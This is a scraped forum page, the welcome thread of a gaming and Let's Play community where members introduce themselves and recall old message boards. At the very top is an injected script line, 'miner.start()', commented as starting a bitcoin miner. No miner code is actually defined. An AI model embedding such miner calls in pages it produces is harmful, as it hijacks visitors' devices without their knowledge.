<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

Introduction/Welcome Thread

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Glacier

Re: Introduction/Welcome Thread

Postby Glacier » 8 months ago

heya!!!!

long time channel lurker, first time talkhaus poster!

i like vgm.

EDIT: oh right yeah i've also been archive binging which is why i joined lol.

iosh
average average dude

Postby iosh » 8 months ago

Hey everyone, I'm iosh !

I've been watching raocow for some years now, and only decided to join now because this place looks neat :slow:
So, uh... yeah, that's all, I think.

Zerio

Postby Zerio » 7 months ago

Hey, I'm Zerio. I used to be pretty active on SMW Central way back, and nowadays I mostly do webcomic stuff. I recently got way into watching raocow's lps, since I was like, hey, this clicks really dang well with my current sense of humor, actually. I also don't really know how to introduce myself!

Artsen

Postby Artsen » 7 months ago

Hey there everyone! This is an introduction post. That's about all there is to it. Happy to be here!

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 7 months ago

Welcome y'all. :catcrime:
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

:pan_pride:

PSI Ninja

Postby PSI Ninja » 6 months ago

I've been posting a bit in the LP threads for several weeks now and just got my username changed (from Edyllroe), so I think now's a good time for an introduction post.

I used to go by Verch Torcitec on the internet 15-20 years ago. Is anyone here old enough to remember ezboards? It was like the Reddit of its time, where you can create a global account and post on any board in the system. Anyone could create their own board for free and add limited HTML/CSS to customize the look. That was the main appeal.

In the early 2000s I used to run an ezboard called Next Generation Consoles. Then real life took over and I stopped doing the whole message board thing. Eventually ezboard went away and the entire archive was wiped from the Wayback Machine from some reason. A big chunk of internet culture is missing because of that. Shoutouts to anyone from the good old days of posting. I miss you all.

Now in the 2020s I come back to the forums and everything's all weird with giant rotating emoticons :ehh: and hats on avatars. Very strange, but I like it. Anyway, I've been rambling. Good to be here.

AmeijinMayo
Ready to go, count zero!
Pronouns: he/him/his

Postby AmeijinMayo » 5 months ago

welcome to talkhaus!
Streaming: Super Robot Wars Z, Disgaea 4 Complete and Atelier Meruru: The Apprentice of Arland

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 5 months ago

PSI Ninja wrote: Now in the 2020s I come back to the forums and everything's all weird with giant rotating emoticons and hats on avatars.
This place has gone particularly mad in the past few months. I blame myself personally, I provoked the admins with access to the style sheets to fix a few small things that were bugging me and they've gone mad with power ever since...

Also welcome! I vaguely remember ezboards, but I was always hopping between other arbitrary phpBB systems back in the day.
ImageImage

“The intent was there; the floor was not.”

PSI Ninja

Postby PSI Ninja » 5 months ago

I've really gotten accustomed to these hats. Now that the A Hat in Time LP is over, they're probably gonna go away soon. I hope it'll remain an option, at least for registered users.

And thanks you two.

Return to “the gazebo”